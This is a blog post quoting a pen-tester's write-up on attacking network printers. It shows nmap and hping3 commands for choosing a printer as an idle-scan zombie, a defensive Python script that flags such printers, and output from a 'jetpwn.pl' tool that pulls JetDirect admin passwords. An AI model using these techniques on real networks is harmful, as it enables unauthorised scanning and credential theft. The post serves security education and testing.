Tuesday, June 15, 2010

Fun with printers

PART - I

"I don’t see a whole lot on the forums about owning printers during a pen test, so I figured I’d post some stuff here.

First, printers are often overlooked when it comes to securing a network. Why? Because all they’re supposed to do is print. You plug them in, install a driver, and so long as the end user can print, all is well in the world.

Thanks to this misconception, we can use network printers to gather boatloads of information, as well as bounce through them when port scanning, cause disruption, and, well, screw with people.

First, printers are PERFECT boxes to use when doing a bounce (aka, IPID, zombie, idle, etc.) scan. Example:

nmap -sS -p9100 10.0.0.* --open
..snip..
Nmap scan report for 10.0.0.23
Host is up (0.00055s latency).
PORT STATE SERVICE
9100/tcp open jetdirect
..snip..


Ok, so we know that .23 is a printer. Yay.. let's see how much activity this thing is seeing at the moment..

hping3 10.0.0.23 -r -p 31337
HPING 10.0.0.23 (eth0 10.0.0.23): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=10.0.0.23 ttl=64 id=54757 sport=31337 flags=RA seq=0 win=0 rtt=0.6 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=1 win=0 rtt=0.9 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=2 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=3 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=4 win=0 rtt=0.8 ms


Sweet.. each IP ID is incremented by 1; this indicates that there’s no other traffic on this printer at the moment. We can use this to bounce through when doing a scan against the PDC...."

Read More
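The hping3 reading in the quoted post is done by eye: a run of "id=+1" replies means the printer's IP ID counter is globally sequential and the box is otherwise idle, which is exactly the property that makes it usable as an idle-scan proxy. Below is an added example (not part of the quoted post, and not one of its tools) that turns that check into an audit script a defender can run over saved hping3 -r output for their own printer inventory. The sample output is copied from the lines above; the delta thresholds and verdict names are assumptions chosen for illustration.

```python
import re

# Constructed sample: the hping3 -r output quoted in the post above.
# With -r (--rel-id) hping3 prints the first IP ID as an absolute value and
# every later one as the delta from the previous reply.
SAMPLE_HPING_OUTPUT = """\
HPING 10.0.0.23 (eth0 10.0.0.23): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=10.0.0.23 ttl=64 id=54757 sport=31337 flags=RA seq=0 win=0 rtt=0.6 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=1 win=0 rtt=0.9 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=2 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=3 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=4 win=0 rtt=0.8 ms
"""

# Matches "id=54757", "id=+1" or "id=-12000" in a reply line.
ID_RE = re.compile(r"\bid=([+-]?\d+)\b")

# Assumed threshold: a consistently small positive step means the counter is
# sequential but other hosts are also talking to the device.
BUSY_MAX_STEP = 50


def parse_ipid_deltas(output):
    """Return the list of per-reply IP ID deltas found in hping3 -r output.

    The first reply carries an absolute id and contributes no delta; header
    lines and lines without an id field are ignored.
    """
    deltas = []
    for line in output.splitlines():
        m = ID_RE.search(line)
        if not m:
            continue
        token = m.group(1)
        if token[0] in "+-":
            deltas.append(int(token))
    return deltas


def classify_ipid(deltas):
    """Classify the IP ID behaviour seen in a run of replies.

    sequential-idle : every reply is +1, a globally sequential counter with no
                      other traffic; this is the case the post describes.
    sequential-busy : small positive steps, sequential counter but shared with
                      other traffic.
    constant        : the id never changes (e.g. a stack that always sends 0).
    unpredictable   : large or negative jumps, i.e. randomised ids.
    """
    if len(deltas) < 3:
        return "insufficient-data"
    if all(d == 1 for d in deltas):
        return "sequential-idle"
    if all(d == 0 for d in deltas):
        return "constant"
    if all(0 < d <= BUSY_MAX_STEP for d in deltas):
        return "sequential-busy"
    return "unpredictable"


def audit_host(output):
    """Parse one host's hping3 -r output and return a small audit record.

    A 'sequential-idle' verdict is the one worth flagging: the device exposes
    a predictable IP ID counter and should be isolated or filtered.
    """
    deltas = parse_ipid_deltas(output)
    verdict = classify_ipid(deltas)
    return {
        "replies": len(deltas) + 1 if deltas else 0,
        "deltas": deltas,
        "verdict": verdict,
        "flag": verdict == "sequential-idle",
    }


if __name__ == "__main__":
    print(audit_host(SAMPLE_HPING_OUTPUT))
```

Run it against captured output from each printer in the inventory; any host reported as sequential-idle is one that a third party could lean on in the way the post describes, and belongs behind an ACL or on a management segment rather than reachable from user subnets.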

PART - II

"Ok, I’ll admit, the last post didn’t have a whole lot to do with printers, but it probably got you interested enough to read part 2.

First, let's find our network printers..

./jetpwn.pl eth0
Using range 10.0.0.1-255

Password for JetDirect running on 10.0.0.22
Hex password: 49 4e 54 45 52 57 45 42 5a
ASCII password: INTERWEBZ

Password for JetDirect running on 10.0.0.23
Hex password: 50 57 4e 5a
ASCII password: PWNZ
Not only did that find the network printers, it also grabbed and converted the password for us. "

Read More
